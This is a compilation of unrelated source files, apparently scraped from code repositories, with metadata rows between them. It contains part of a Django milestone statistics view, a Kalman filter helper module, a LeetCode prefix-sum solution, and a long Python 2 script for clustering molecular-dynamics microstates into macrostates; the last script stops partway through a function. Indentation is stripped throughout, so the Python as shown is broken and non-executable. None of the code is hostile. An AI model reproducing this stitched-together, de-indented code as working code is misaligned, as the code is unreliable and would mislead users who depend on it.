'name': current_date.day,
'open_points': sumTotalPoints - sum(milestone.closed_points_by_date(current_date).values()),
'optimal_points': optimal_points,
})
current_date = current_date + datetime.timedelta(days=1)
optimal_points -= optimal_points_per_day
return response.Ok(milestone_stats)
class MilestoneWatchersViewSet(WatchersViewSetMixin, ModelListViewSet):
permission_classes = (permissions.MilestoneWatchersPermission,)
resource_model = models.Milestone
| agpl-3.0 | 812,098,269,733,922,800 | 41.986014 | 109 | 0.650887 | false |
DStauffman/dstauffman | dstauffman/estimation/kalman.py | 1 | 8438 | r"""
Functions related to Kalman Filter analysis.
Notes
-----
#. Written by David C. Stauffer in April 2019.
"""
#%% Imports
import doctest
import unittest
from dstauffman import HAVE_NUMPY
from dstauffman.numba import ncjit
from dstauffman.estimation.linalg import mat_divide
if HAVE_NUMPY:
import numpy as np
#%% Functions - calculate_kalman_gain
def calculate_kalman_gain(P, H, R, *, use_inverse=False, return_innov_cov=False):
r"""
Calculates K, the Kalman Gain matrix.
Parameters
----------
P : (N, N) ndarray
Covariance Matrix
H : (A, B) ndarray
Measurement Update Matrix
R : () ndarray
Measurement Noise Matrix
use_inverse : bool, optional
Whether to explicitly calculate the inverse or not, default is False
Returns
-------
K : (N, ) ndarray
Kalman Gain Matrix
Pz : (N, N) ndarray
Innovation Covariance Matrix
Notes
-----
#. Written by David C Stauffer in December 2018.
Examples
--------
>>> from dstauffman.estimation import calculate_kalman_gain
>>> import numpy as np
>>> P = 1e-3 * np.eye(5)
>>> H = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1], [0.5, 0.5, 0.5], [0, 0, 0.1]]).T
>>> R = 0.5 * np.eye(3)
>>> K = calculate_kalman_gain(P, H, R)
"""
# calculate the innovation covariance
Pz = H @ P @ H.T + R
if use_inverse:
# explicit version with inverse
K = (P @ H.T) @ np.linalg.inv(Pz)
else:
# implicit solver
K = mat_divide(Pz.T, (P @ H.T).T).T
# return desired results
if return_innov_cov:
return (K, Pz)
return K
@ncjit
def calculate_kalman_gain_opt(P, H, R):
r"""Calculate the Kalman gain, in a way optimized for use with numba."""
Pz = H @ P @ H.T + R
K = mat_divide(Pz.T, (P @ H.T).T).T
return (K, Pz)
#%% Functions - calculate_prediction
@ncjit
def calculate_prediction(H, state, const=None):
r"""
Calculates u, the measurement prediction.
Parameters
----------
H : (A, B) ndarray
Measurement Update matrix
state : (A, ) ndarray
State vector
const : (A, ) ndarray, optional
Constant state vector offsets
Returns
-------
(A, ) ndarray
Delta state vector
Notes
-----
#. Written by David C. Stauffer in September 2020.
Examples
--------
>>> from dstauffman.estimation import calculate_prediction
>>> import numpy as np
>>> H = np.array([[1., 0.], [0., 1.], [0., 0.]])
>>> state = np.array([1e-3, 5e-3])
>>> u_pred = calculate_prediction(H, state)
>>> print(u_pred) # doctest: +NORMALIZE_WHITESPACE
[0.001 0.005 0. ]
"""
if const is None:
return H @ state
return H @ (state + const)
#%% Functions - calculate_innovation
@ncjit
def calculate_innovation(u_meas, u_pred):
r"""
Calculates z, the Kalman Filter innovation.
Parameters
----------
u_meas : (A, ) ndarray
Measured state vector
u_pred : (A, ) ndarray
Predicted state vector
Returns
-------
(A, ) ndarray
Kalman Filter innovation
Notes
-----
#. Written by David C. Stauffer in September 2020.
Examples
--------
>>> from dstauffman.estimation import calculate_innovation
>>> import numpy as np
>>> u_meas = np.array([1., 2.1, -3.])
>>> u_pred = np.array([1.1, 2.0, -3.1])
>>> z = calculate_innovation(u_meas, u_pred)
>>> with np.printoptions(precision=8):
... print(z) # doctest: +NORMALIZE_WHITESPACE
[-0.1 0.1 0.1]
"""
return u_meas - u_pred
#%% Functions - calculate_normalized_innovation
@ncjit
def calculate_normalized_innovation(z, Pz, use_inverse=False):
r"""
Calculates nu, the Normalized Kalman Filter Innovation.
Parameters
----------
z : (A, ) ndarray
Kalman Filter innovation
Pz : (A, A) ndarray
Kalman Filter innovation covariance
use_inverse : bool, optional
Whether to explicitly calculate the inverse or not, default is False
Returns
-------
(A, ) ndarray
Normalized innovation
Notes
-----
#. Written by David C. Stauffer in September 2020.
Examples
--------
>>> from dstauffman.estimation import calculate_normalized_innovation
>>> import numpy as np
>>> z = np.array([0.1, 0.05, -0.2])
>>> Pz = np.array([[0.1, 0.01, 0.001], [0.01, 0.1, 0.001], [0., 0., 0.2]])
>>> nu = calculate_normalized_innovation(z, Pz)
>>> with np.printoptions(precision=8):
... print(nu) # doctest: +NORMALIZE_WHITESPACE
[ 0.96868687 0.41313131 -1. ]
"""
if use_inverse:
return np.linalg.inv(Pz) @ z
return mat_divide(Pz, z)
#%% Functions - calculate_delta_state
@ncjit
def calculate_delta_state(K, z):
r"""
Calculates dx, the delta state for a given measurement.
Parameters
----------
K : (A, B) ndarray
Kalman Gain Matrix
z : (A, ) ndarray
Kalman Filter innovation
Notes
-----
#. Written by David C. Stauffer in September 2020.
Examples
--------
>>> from dstauffman.estimation import calculate_delta_state
>>> import numpy as np
>>> K = np.array([[0.1, 0.01, 0.001], [0.01, 0.1, 0.001], [0., 0., 0.2]])
>>> z = np.array([0.1, 0.05, -0.2])
>>> dx = calculate_delta_state(K, z)
>>> with np.printoptions(precision=8):
... print(dx) # doctest: +NORMALIZE_WHITESPACE
[ 0.0103 0.0058 -0.04 ]
"""
return K @ z
#%% Functions - propagate_covariance
def propagate_covariance(P, phi, Q, *, gamma=None, inplace=True):
r"""
Propagates the covariance forward in time.
Parameters
----------
P :
Covariance matrix
phi :
State transition matrix
Q :
Process noise matrix
gamma :
Shaping matrix?
inplace : bool, optional, default is True
Whether to update the value inplace or as a new output
Returns
-------
(N, N) ndarray
Updated covariance matrix
Notes
-----
#. Written by David C. Stauffer in December 2018.
#. Updated by David C. Stauffer in July 2020 to have inplace option.
Examples
--------
>>> from dstauffman.estimation import propagate_covariance
>>> import numpy as np
>>> P = 1e-3 * np.eye(6)
>>> phi = np.diag([1., 1, 1, -1, -1, -1])
>>> Q = np.diag([1e-3, 1e-3, 1e-5, 1e-7, 1e-7, 1e-7])
>>> propagate_covariance(P, phi, Q)
>>> print(P[0, 0])
0.002
"""
if gamma is None:
out = phi @ P @ phi.T + Q
else:
out = phi @ P @ phi.T + gamma @ Q @ gamma.T
if inplace:
P[:] = out
else:
return out
@ncjit
def propagate_covariance_opt(P, phi, Q, gamma=None):
r"""Propagate the covariance in time, in a way optimized for use with numba."""
if gamma is None:
P[:] = phi @ P @ phi.T + Q
else:
P[:] = phi @ P @ phi.T + gamma @ Q @ gamma.T
#%% Functions - update_covariance
def update_covariance(P, K, H, *, inplace=True):
r"""
Updates the covariance for a given measurement.
Parameters
----------
P : (N, N) ndarray
Covariance Matrix
K : (N, ) ndarray
Kalman Gain Matrix
H : (A, N) ndarray
Measurement Update Matrix
inplace : bool, optional, default is True
Whether to update the value inplace or as a new output
Returns
-------
P_out : (N, N) ndarray
Updated Covariance Matrix
Notes
-----
#. Written by David C Stauffer in December 2018.
#. Updated by David C. Stauffer in July 2020 to have inplace option.
Examples
--------
>>> from dstauffman.estimation import update_covariance
>>> import numpy as np
>>> P = 1e-3 * np.eye(6)
>>> P[0, -1] = 5e-2
>>> K = np.ones((6, 3))
>>> H = np.hstack((np.eye(3), np.eye(3)))
>>> update_covariance(P, K, H)
>>> print(P[-1, -1])
-0.05
"""
out = (np.eye(*P.shape) - K @ H) @ P
if inplace:
P[:] = out
else:
return out
@ncjit
def update_covariance_opt(P, K, H):
r"""Propagate the covariance in time, in a way optimized for use with numba."""
P[:] = (np.eye(*P.shape) - K @ H) @ P
#%% Unit Test
if __name__ == '__main__':
unittest.main(module='dstauffman.tests.test_estimation_kalman', exit=False)
doctest.testmod(verbose=False)
| lgpl-3.0 | -4,143,109,021,988,057,000 | 24.263473 | 87 | 0.567907 | false |
tktrungna/leetcode | Python/range-sum-query-immutable.py | 1 | 1146 | """
QUESTION:
Given an integer array nums, find the sum of the elements between indices i and j (i < j), inclusive.
Example:
Given nums = [-2, 0, 3, -5, 2, -1]
sumRange(0, 2) -> 1
sumRange(2, 5) -> -1
sumRange(0, 5) -> -3
Note:
You may assume that the array does not change.
There are many calls to sumRange function.
ANSWER:
sum accumulation
"""
class NumArray(object):
def __init__(self, nums):
"""
initialize your data structure here.
:type nums: List[int]
"""
self.nums = nums
self.sum = [0]*len(self.nums)
for i in xrange(len(nums)):
self.sum[i] = nums[i] if i == 0 else self.sum[i-1]+nums[i]
def sumRange(self, i, j):
"""
sum of elements nums[i..j], inclusive.
:type i: int
:type j: int
:rtype: int
"""
return self.sum[j]-self.sum[i]+self.nums[i]
# Your NumArray object will be instantiated and called as such:
# numArray = NumArray(nums)
# numArray.sumRange(0, 1)
# numArray.sumRange(1, 2)
if __name__ == '__main__':
numArray = NumArray([-2, 0, 3, -5, 2, -1])
print numArray.sumRange(0, 1)
| mit | -799,236,257,874,062,700 | 22.875 | 101 | 0.578534 | false |
stephenliu1989/HK_DataMiner | hkdataminer/Nystrom_code/microToMacroBySHC_v2.0b.py | 1 | 41931 | #!/usr/bin/env python
#######################################################
#Written by Daniel Silva
#Based in the original SHC code from Yuan YAO and Xuhui Huang:
# Proceedings of the Pacific Symposium on Biocomputing, 15, 228-239, (2010)
#
#Intended to be used in the SimTK project
#Ver. 1.5b 21/Apr/2011
#######################################################
import optparse
import sys
import linecache
import scipy.io
import numpy as np
#import colorsys
from pylab import *
from numpy import *
from scipy import *
from scipy.sparse import *
from scipy.sparse.linalg import *
from scipy.linalg import eig
from scipy.interpolate import interp1d
from scipy.sparse.linalg.eigen.arpack import *
def version():
print "(OUTPUT) Python SHC ver 2.01b"
#def licence():
def main():
version()
# licence()
p = optparse.OptionParser()
p.add_option('--outMicroCountMatrixName', '-c', default="microstateCountMatrix.mtx")
p.add_option('--lagstep', '-l', default="1")
p.add_option('--headDir', '-d', default="./")
p.add_option('--trajlist', '-t', default="-1")
p.add_option('--plevelsFile', '-p', default="plevels.shc")
p.add_option('--outMacrostateAssignementsMap', '-s', default="macrostateMap.map")
p.add_option('--writeMacroAssignments', '-w', default="0")
p.add_option('--optimumMacrostateSize', '-o', default="0.01")
p.add_option('--maximumAssignIterations', '-i', default="10")
p.add_option('--removeBarelyConnectedMicros', '-r', default="0")
p.add_option('--writeTCMtxt', '-x', default="0")
p.add_option('--scanModeTopDensity', '-a', default="0.0")
p.add_option('--inputMatrix', '-m', default="")
p.add_option('--outFlowGraphName', '-f', default="macroFlowGraph.dot")
p.add_option('--bJumpWindow', '-j', default="0")
p.add_option('--whichGap', '-g', default="1")
options, arguments = p.parse_args()
outMicroCountMatrixName = (options.outMicroCountMatrixName)
tLag = int(options.lagstep)
headDir = (options.headDir)
trajlistfiles = (options.trajlist)
pLevelsFilename = (options.plevelsFile)
outMacrostateAssignementsMap = (options.outMacrostateAssignementsMap)
optimumMacrostateSize = float(options.optimumMacrostateSize)
writeMAssignments = int(options.writeMacroAssignments)
maximumAssignIterations = int(options.maximumAssignIterations)
numRemoveBarelyConnectedMicros = int(options.removeBarelyConnectedMicros)
writeTCMtxt = int(options.writeTCMtxt)
scanModeTopDensity = float(options.scanModeTopDensity)
inputMatrix = (options.inputMatrix)
outFlowGraphName = (options.outFlowGraphName)
bJumpWindow = int(options.bJumpWindow)
chooseGap = int(options.whichGap)
#if (len(inputMatrix) == 0 ):
# originalMicrosCountM= getMicroTransitionsFromAssignements(tLag, headDir, trajlistfiles, bJumpWindow)
#else:
# print "(OUTPUT) ", ("Reading data from TCM file: \"%s\" ", inputMatrix)
# if ( linecache.getline(inputMatrix, 1).strip() == "%%MatrixMarket matrix coordinate integer general"):
# print "(OUTPUT) ", ("Detected sparce matrix in the Matrix Market format")
# originalMicrosCountM = scipy.io.mmread(inputMatrix)
# else:
# print "(OUTPUT) ", ("Detected matrix in raw txt format")
# originalMicrosCountM = genfromtxt(inputMatrix)
# originalMicrosCountM = lil_matrix(originalMicrosCountM)
originalMicrosCountM = scipy.io.mmread(inputMatrix)
#The code is made to use a float matrix, even if the input (transitions) are integers. This way is just convinient to avoid errors due to loosing floats
originalMicrosCountM = originalMicrosCountM.tocsc()/1.0
writeCountMatrix(originalMicrosCountM, outMicroCountMatrixName, "Writing microstates transition count matrix", writeTCMtxt)
if (numRemoveBarelyConnectedMicros > 0):
originalMicrosCountM = removeBarelyConnectedMicros(originalMicrosCountM, numRemoveBarelyConnectedMicros)
connectedMicrosCountM, connectedMicrosIndex = getConnectedMicrostates(originalMicrosCountM)
writeCountMatrix(connectedMicrosCountM, ("%s_connected" % outMicroCountMatrixName), "Writing connected microstates transition count matrix", 0)
connectedMicrosCountM_X = csc_matrix(connectedMicrosCountM + connectedMicrosCountM.conj().transpose())/2 ;
microstate_size = connectedMicrosCountM.sum(axis=1)
cumulativeSumOfRows = cumulativeDesityFunctionOfHeightFilter(microstate_size)
pLevels=[]
if ( scanModeTopDensity > 0.0 ):
pLevels = scanPlevels(cumulativeSumOfRows, connectedMicrosCountM_X, microstate_size, 0.01, 0.01, scanModeTopDensity, chooseGap)
else:
pLevels = readPlevels(pLevelsFilename, cumulativeSumOfRows)
clusters = zeros(len(pLevels), int)
levels = []
levelsLine=""
for i in range (0, len(pLevels)):
if ((sum(cumulativeSumOfRows<=pLevels[i])) > 2): #Detect and remove density levels with <10 microstate
levels.append(sum(cumulativeSumOfRows<=pLevels[i]))
levelsLine += ("%1.3f " % pLevels[i])
else:
print "(OUTPUT) ", ("Density level at \"%1.3f\" is empty or have to few microstates (<2), it was removed it from the analysis"% (pLevels[i]))
print "(OUTPUT) ", ("**SHC analysis will use %d density levels: %s" % (len(levels), levelsLine))
(aBettis, specGaps) = apBetti(connectedMicrosCountM_X, microstate_size, levels)
for i in range (0, len(levels)):
if (chooseGap < 1):
print "(OUTPUT) ", ("WARNING: The spectral gap choosen (1st, 2nd, etc) cannot have a value less than 1, automaticaly changing the gap (-g) to 1")
chooseGap=1
if (chooseGap > 1):
print "(OUTPUT) ", ("WARNING:You are using an spectral gap ( ) different to the 1st. Is this really what you want to do?")
clusters[i] = aBettis[i][chooseGap-1]
superLevels=superLevelSet(microstate_size, levels, clusters) #0 is IDs and 1 is IGs
(adja, nodeInfoLevel, nodeInfoLevelSize, nodeInfoSet, nodeInfoFilter, levelIdx, ci, csize) = superMapper(connectedMicrosCountM_X, superLevels)
(cptLocalMax, cptGradFlow, cptEquilibriumEQ) = flowGrad(adja, levelIdx, nodeInfoLevel, nodeInfoLevelSize, nodeInfoSet, nodeInfoFilter)
writeFlowGraph(cptGradFlow, nodeInfoLevel, nodeInfoLevelSize, nodeInfoSet, nodeInfoFilter, levelIdx, superLevels, outFlowGraphName, pLevels)
(ci, csize, fassign, T, Qmax, id_fuzzy) = optimumAssignment(connectedMicrosCountM_X, cptEquilibriumEQ, nodeInfoLevelSize, nodeInfoSet, nodeInfoFilter, maximumAssignIterations)
writeMacrostateMap(outMacrostateAssignementsMap, originalMicrosCountM.shape[0], ci, connectedMicrosIndex)
if (writeMAssignments ==1):
writeMacroAssignments(tLag, headDir, trajlistfiles, ci, connectedMicrosIndex, originalMicrosCountM.shape[0])
print "(OUTPUT) ", ("Done with SHC!")
def scanPlevels(cumulativeSumOfRows, connectedMicrosCountM_X, microstate_size, start, incr, end, chooseGap):
print "(OUTPUT) ", "Will perform a scan to discover optimum density levels for SHC (EXPERIMENTAL)"
clustersScan = zeros(1, int)
pLevels=[]
pLevelsScan=[]
pLevelsScan.append(0)
pLevelSGQuality=[]
pLevelNumMacro=[]
tmpMaxNumMacro=0
tmpMaxGapQuality=0
testLevels = np.arange(start,end,incr)
for i in testLevels:
levelsScan = []
pLevelsScan[0] = i
specGapQuality=0
print "(OUTPUT) ", ("Testing Density level: \"%1.3f\" " % pLevelsScan[0])
if ((sum(cumulativeSumOfRows<=pLevelsScan[0])) > 1+chooseGap):
levelsScan.append(sum(cumulativeSumOfRows<=pLevelsScan[0]))
(aBettis, specGaps) = apBetti(connectedMicrosCountM_X, microstate_size, levelsScan)
clustersScan[0] = aBettis[0][0]
superLevels=superLevelSet(microstate_size, levelsScan, clustersScan) #0 is IDs and 1 is IGs
(adja, nodeInfoLevel, nodeInfoLevelSize, nodeInfoSet, nodeInfoFilter, levelIdx, ci, csize) = superMapper(connectedMicrosCountM_X, superLevels)
print specGaps
specGapQuality = specGaps[0][chooseGap-1] - specGaps[0][chooseGap]
if ( (len(csize[0])) > tmpMaxNumMacro):
tmpMaxNumMacro = len(csize[0])
tmpMaxGapQuality = specGapQuality
pLevels.append(np.copy(pLevelsScan[0]))
pLevelSGQuality.append(np.copy(specGapQuality))
pLevelNumMacro.append(np.copy(tmpMaxNumMacro))
elif ( ((len(csize[0])) <= tmpMaxNumMacro) and (specGapQuality > tmpMaxGapQuality) ):
tmpMaxNumMacro = len(csize[0])
tmpMaxGapQuality = specGapQuality
pLevels[(len(pLevels)-1)] = pLevelsScan[0]
pLevelSGQuality[(len(pLevels)-1)] = specGapQuality
pLevelNumMacro[(len(pLevels)-1)] = len(csize[0])
else:
print "(OUTPUT) ", ("Skipping density level at \"%1.3f\" because it contains to few microstates ( <2 )" % pLevelsScan[0])
print "(OUTPUT) ", "Optimum density levels identified & num of macrostates per level:"
counter=0
for i in pLevels:
print "(OUTPUT) \t", i, "\t", pLevelNumMacro[counter]
counter+=1
print "(OUTPUT) ", "Sum of the differences of the spectral gaps:"
for i in pLevelSGQuality:
print "(OUTPUT) ", i
print "(OUTPUT) ", "Density levels scan DONE. Proceding to the SHC clustering!"
return pLevels
def removeBarelyConnectedMicros(originalMicrosCountM, numRemoveBarelyConnectedMicros):
print "(OUTPUT) ", ("Removing barely connected microstates with a cut off <%d transitions (in or out) (EXPERIMENTAL)" % numRemoveBarelyConnectedMicros)
counter=0
originalMicrosCountM = originalMicrosCountM.todense()
for i in range (0, originalMicrosCountM.shape[0]):
if (((originalMicrosCountM[i,:].sum() - originalMicrosCountM[i,i] - numRemoveBarelyConnectedMicros) < 0 ) or ((originalMicrosCountM[:,i].sum() - originalMicrosCountM[i,i] - numRemoveBarelyConnectedMicros) < 0 )):
counter+=1
originalMicrosCountM[i,:] = 0
originalMicrosCountM[:,i] = 0
print "(OUTPUT) ", ("Removed %d barely connected microstates (turn to pop 0)..." % counter)
originalMicrosCountM = csc_matrix(originalMicrosCountM)
return(originalMicrosCountM)
def writeMacrostateMap(outName, nMicro, ci, connectedMicrosIndex):
print "(OUTPUT) ", ("Writting macrostate maping file: %s" % outName)
f = open(outName,'w')
micro2macro = zeros((nMicro), int)
micro2macro[connectedMicrosIndex] = ci
for i in range(0, nMicro):
line = (micro2macro[i]-1)
print >>f, line
f.close()
print "(OUTPUT) ", ("Done writting macrostate maping file!")
def writeMacroAssignments(tLag, headDir, trajlistfiles, ci, connectedMicrosIndex, nMicro):
print "(OUTPUT) ", ("Writting macrostate assignments to:")
micro2macro = zeros((nMicro), int)
micro2macro[connectedMicrosIndex] = ci
for filenameInp in file(trajlistfiles):
filenameInp = filenameInp.strip()
filenameInp = "%s/assignments/%s" % (headDir,filenameInp)
tmpLineLen=len(filenameInp)+10
sys.stdout.write('(OUTPUT) %s' % filenameInp)
for i in range (0, tmpLineLen):
sys.stdout.write('\b')
output = []
for line in file(filenameInp):
line=line.strip().split()
if (int(line[0]) > -1):
lineout="%d %d" %( int(line[0]), (micro2macro[int(line[0])] -1))
else:
lineout="%d -1" %( int(line[0]))
output.append(lineout)
f = open(filenameInp,'w')
for line in output:
print >>f, line
f.close()
print "\n", "(OUTPUT) ", ("Done writting macrostate assignments!")
def getMicroTransitionsFromAssignements(tLag, headDir, trajlistfiles,bJumpWindow):
originalNumOfMicros=0
totalCounts=0
numberOfTrajs=0
print "(OUTPUT) ", ("Assesing the number of microstates...")
for filenameInp in file(trajlistfiles):
filenameInp = filenameInp.strip()
filenameInp = "%s/assignments/%s" % (headDir,filenameInp)
tmpLineLen=len(filenameInp)+10
numberOfTrajs+=1
sys.stdout.write('(OUTPUT) %s' % filenameInp)
for i in range (0, tmpLineLen):
sys.stdout.write('\b')
for line in file(filenameInp):
line = line.strip().split()
line = int(line[0])
if (line > originalNumOfMicros):
originalNumOfMicros = line
if (originalNumOfMicros>0):
originalNumOfMicros+=1
print "(OUTPUT) ", ("Found %d microstates in %d trajectories" % (originalNumOfMicros, numberOfTrajs))
elif (originalNumOfMicros==0):
print "(OUTPUT) ", ("Found 0 microstates in %d trajectories, cannot continue!", numberOfTrajs)
exit(0)
print "(OUTPUT) ", ("Reading microstates assignments from files and counting transitions:")
originalMicrosCount= lil_matrix((originalNumOfMicros, originalNumOfMicros))
tmpLineLen=0
for filenameInp in file(trajlistfiles):
filenameInp = filenameInp.strip()
filenameInp = "%s/assignments/%s" % (headDir,filenameInp)
tmpLineLen=len(filenameInp)+10
for i in range (0, tmpLineLen):
sys.stdout.write('\b')
previousm=-1
trajLength = 0
for line in file(filenameInp):
trajLength += 1
###NEXT IS SLIDING WINDOW###
if ( bJumpWindow == 0 ):
trajectory=zeros ((trajLength), int)
for i in range (1, trajLength):
line = linecache.getline(filenameInp, i).strip().split()
trajectory[i] = line[0]
for i in range (0, trajLength-tLag):
if ((trajectory[i] >= 0) & (trajectory[i+tLag]>= 0)) :
originalMicrosCount[trajectory[i], trajectory[i+tLag]]+=1
###END SLIDING WINDOW###
###NEXT IS JUMP WINDOW###
if ( bJumpWindow == 1 ):
trajectory=zeros ((trajLength/tLag)+1, int)
for i in range (0, trajLength): #Qin's Fix (THX)
line = linecache.getline(filenameInp, i+1).strip().split()
if(i%tLag==0): #Qin's Fix (THX)
trajectory[i/tLag]=(int(line[0]))
for i in range(0, (trajLength/tLag)-1):
if ((trajectory[i] >= 0) & (trajectory[i+1]>= 0)) :
originalMicrosCount[trajectory[i], trajectory[i+1]]+=1
###END JUMP WINDOW##
print "\n", "(OUTPUT) ", ("Finished with microstates count!")
print "(OUTPUT) ", ("Total number of microstate transitions: %d" % originalMicrosCount.sum() )
originalMicrosCount = originalMicrosCount.tocsc()
emptyNumber=0
for i in range (0, originalNumOfMicros):
if ((originalMicrosCount[i,:].sum() + originalMicrosCount[:,i].sum()) == 0):
emptyNumber+=1
print("Warning microstate %d is empty!" % i)
if(emptyNumber > 0):
print "(OUTPUT) ", ("Warning, there are %d empty microstates" % emptyNumber)
print "(OUTPUT) ", ("There are %d non-empty microstates" % (originalMicrosCount.shape[0]-emptyNumber))
return (originalMicrosCount)
def writeCountMatrix ( originalMicrosCount, outMicroCountMatrixName, message, doWriteTXT):
print "(OUTPUT) ", (message)
scipy.io.mmwrite(outMicroCountMatrixName, originalMicrosCount, field="integer")
if (doWriteTXT == 1):
print "(OUTPUT) Writing (also) a count matrix in TXT format! (May be very slow, be patient)"
outMicroCountMatrixName="%s.txt"%(outMicroCountMatrixName)
f = open(outMicroCountMatrixName,'w')
advanceCounter=0.0
numMicros=originalMicrosCount.shape[0]
originalMicrosCount=originalMicrosCount.tolil()
outline="0.0% Complete"
sys.stdout.write('(OUTPUT) %s' %outline)
for i in range(0, numMicros):
advanceCounter+=1.0
print advanceCounter, numMicros
line=" "
for j in range(0, numMicros):
line+= str(int(originalMicrosCount[i,j])) + " "
print >>f, line
if (advanceCounter >= (numMicros/100.0)):
for k in range (0, len(outline)+10):
sys.stdout.write('\b')
sys.stdout.write('(OUTPUT) %s' % outline)
outline="%.1f%% Complete " % ((i+1)*100/numMicros)
advanceCounter=0
print "\n", "(OUTPUT) ", ("Finished TXT write!")
f.close()
def getConnectedMicrostates (originalMicrosCount):
print "(OUTPUT) ", ("Searching connected microstates using graph theory")
microConnectedComponents=cs_graph_components((originalMicrosCount + originalMicrosCount.conj().transpose()))
componentsSize=zeros((microConnectedComponents[0]+1), int)
emptySize=0
for i in microConnectedComponents[1]:
if (i >= 0):
componentsSize[i+1]+=1
else:
emptySize +=1
indexMaxConnected, sizeMaxConnected = componentsSize.argmax(0), componentsSize.max(0)
lineout = ("Found %d connected microstates, %d disconnected microstates and %d empty microstates" % (sizeMaxConnected, (componentsSize.sum()-sizeMaxConnected), emptySize))
print "(OUTPUT) ", lineout
if ((emptySize > 0) | ((componentsSize.sum()-sizeMaxConnected) > 0)):
print "(OUTPUT) ", "Removing disconnected microstates"
connectedMicrosIndex = where(microConnectedComponents[1] == (indexMaxConnected-1))
connectedMicrosIndex = getIndexFromArray(connectedMicrosIndex[0])
connectedMicros = originalMicrosCount[ix_(connectedMicrosIndex,connectedMicrosIndex)]
else:
connectedMicros = originalMicrosCount
connectedMicrosIndex = range(0,componentsSize.sum())
return connectedMicros, connectedMicrosIndex
def readPlevels(fileName, cumulativeSumOfRows):
print "(OUTPUT) ", ("Reading density levels from file: %s" % fileName)
pLevels=[]
for line in file(fileName):
line = line.strip()
pLevels.append(float(line))
return (pLevels)
def cumulativeDesityFunctionOfHeightFilter(x):
total = sum(x)
x = -x
x.ravel().sort()
x = -x
y = x.cumsum(axis=0)/total
return y
def getIndexFromMatrix(indexA):
xx = indexA
xxx=[]
for i in range (0, len(xx)):
xxx.append(xx[i,0])
return(xxx)
def getIndexBFromMatrix(indexB):
xx = indexB
xxx=[]
for i in range (0, len(xx)):
xxx.append(xx[0,i])
return(xxx)
def getIndexFromArray(indexA):
xx = indexA
xxx=[]
for i in range (0, len(xx)):
xxx.append(xx[i])
return(xxx)
def IntList2array(listA):
xx = listA
xxx= zeros((len(listA)),int)
for i in range (0, len(xx)):
xxx[i] = xx[i]
return(xxx)
def apBetti(X, filterX, levels):
print "(OUTPUT) ", ("Computing persistent aproximate betti numbers via spectral gaps")
#X = X.tocsc()
ig = filterX/(max(filterX))
#print "PPC",filterX, (max(filterX))
ig = -ig
rk = ig.argsort(axis=0)
ig.sort(axis=0)
ig = -ig
MAXNUMBEREIG = 20;
k = MAXNUMBEREIG
eps = 1e-4
randSurf = 1e-1
N = len(filterX)
revecs = []
revals = []
Components = []
specGaps = []
aBettis = []
for i in range (0, len(levels)):
revecs.append(0)
revals.append(0)
Components.append(0)
specGaps.append(0)
aBettis.append(0)
print "(OUTPUT) ", ("Level\tSize\t#Comp\tB0_1\tGap_1\t\tB0_2\tGap_2\t\tB0_3\tGap_3")
for i in range (0, len(levels)):
if (levels[i] > 1):
n = int(levels[i])
else:
n = int(sum(ig>=levels[i]))
outline= ("%d\t %d\t"%(i,n));
if (n == 1):
Components[i] = 1
specGaps[i] = ones(MAXNUMBEREIG);
aBettis[i] = [1, zeros(MAXNUMBEREIG-1)]
else:
tmpindx = getIndexFromMatrix(rk[0:n])
Y = csc_matrix(((X[ix_(tmpindx,tmpindx)])) + (eps*identity(n)) +(randSurf * ones((n,n), float)/n))
Y2 = zeros((n,n))
tmparray=[]
for j in Y.sum(axis=1):
tmparray.append(j[0,0])
Y2[diag_indices(n)]= tmparray
Y2 = csc_matrix(Y2)
sigma = 1+eps+randSurf
B = Y - sigma*Y2
sigma_solve = dsolve.splu(B)
Y2L = aslinearoperator(Y2)
if ((n-4) > MAXNUMBEREIG):
# revals[i],revecs[i] = ARPACK_gen_eigs( Y2L.matvec, sigma_solve.solve, Y2L.shape[0], sigma, MAXNUMBEREIG, 'LM' )
revals[i],revecs[i] = eigs( Y, MAXNUMBEREIG, Y2, sigma, which='LM', maxiter=10000 )
else:
revals[i],revecs[i] = scipy.linalg.eig( Y.todense(),Y2.todense() )
revals[i]=real(revals[i])
#SORT EIGENVALUES AND EIGENVECTORS
tmpindsort = argsort(-revals[i])
revals[i] = revals[i][tmpindsort]
revecs[i] = revecs[i][:, tmpindsort] # second axis !!
if (n > MAXNUMBEREIG):
revals[i] = revals[i][:MAXNUMBEREIG]
revecs[i] = revecs[i][:, :MAXNUMBEREIG]
#Remove later DASM
# tmplineout=""
# for ii in revals[i]:
# tmplineout+=" "+ str(ii)
# print "(DEBUG) Using a matrix of %ix%i, eigenvalues are:\n(DEBUG) \t" %((n-4),(n-4)), tmplineout
#END REMOVE#
Components[i] = sum(revals[i]>(1-1e-5))
tmpSpecGaps = -(abs(diff(revals[i])))
aBettis[i] = tmpSpecGaps.argsort(axis=0)
for xx in range (1, len(revals[i])): #FIX for eigenvalues = 1.0 on lowlevels
if ((revals[i][xx]+1e-5) >= 1) and (aBettis[i][0] < xx):
aBettis[i][0]+=1
else:
break
tmpSpecGaps.sort(axis=0)
specGaps[i] = -tmpSpecGaps
outline += ('%d\t'% Components[i])
for gaplist in range (0, min(3,len(aBettis[i]))):
outline += ('%d\t %f\t'%(aBettis[i][gaplist], specGaps[i][gaplist]));
print "(OUTPUT) ", outline
print "(OUTPUT) ",("Done with betti numbers!")
return (aBettis, specGaps)
def superLevelSet(filterX, levels, clusters):
ig = -filterX
idd = ig.argsort(axis=0)
ig.sort(axis=0)
ig = -ig
superLevelSetId = []
superLevelSetIg = []
for i in range (0, len (levels)):
superLevelSetId.append(np.copy(idd[0:levels[i]]))
superLevelSetIg.append(np.copy(clusters[i]))
return (superLevelSetId, superLevelSetIg)
def superMapper (X,superLevelSet):
print "(OUTPUT) ", ('Executing the SMapper')
numPoints = X.shape[0]
dim = X.shape[1]
if (dim!=numPoints):
print "(OUTPUT) ", ('ERROR: the input for the mapper must be a symmetric transition count matrix!')
sys.exit()
numLevels = len(superLevelSet[0])
lengthX = []
idxSort = []
for i in range (0, numLevels):
lengthX=concatenate((lengthX,len(superLevelSet[0][i])), axis=None)
tmpReshape = superLevelSet[0][i].reshape(1,lengthX[i])
tmpReshape2 = []
for j in range (0, size(tmpReshape, axis=1)):
tmpReshape2.append(np.copy(tmpReshape[0,j]))
idxSort=concatenate((idxSort,tmpReshape2), axis=None)
Y = X[ix_(idxSort,idxSort)];
print "(OUTPUT) ", ("SMapper:\tnumber of points %d" % numPoints);
print "(OUTPUT) ", ("\t\tnumber of levels %d" % len(superLevelSet[0]));
numGraphNodes = 0
nodeInfoLevel = []
